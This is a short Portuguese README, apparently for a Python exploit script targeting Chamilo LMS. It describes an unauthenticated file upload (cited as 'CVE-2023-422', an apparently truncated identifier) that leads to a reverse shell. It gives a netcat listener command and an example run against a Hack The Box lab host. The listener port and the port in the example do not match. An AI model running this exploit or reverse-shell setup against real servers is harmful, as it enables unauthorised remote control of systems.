
Execução Remota de Código para Chamilo LMS
pip install requests
O script Python utiliza a vulnerabilidade CVE-2023-422 para carregar um ficheiro no servidor e usa esse ficheiro para enviar uma reverse shell para o netcat listener, e tudo isto pode ser feito sem autenticação. No entanto, precisará de seguir os seguintes passos para utilizar o script Python com sucesso.
Iniciar o netcat listener:
nc -lnvp 4444
Executar o Script Python (Exemplo):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
Deixe uma estrela se o seguinte exploit foi útil :)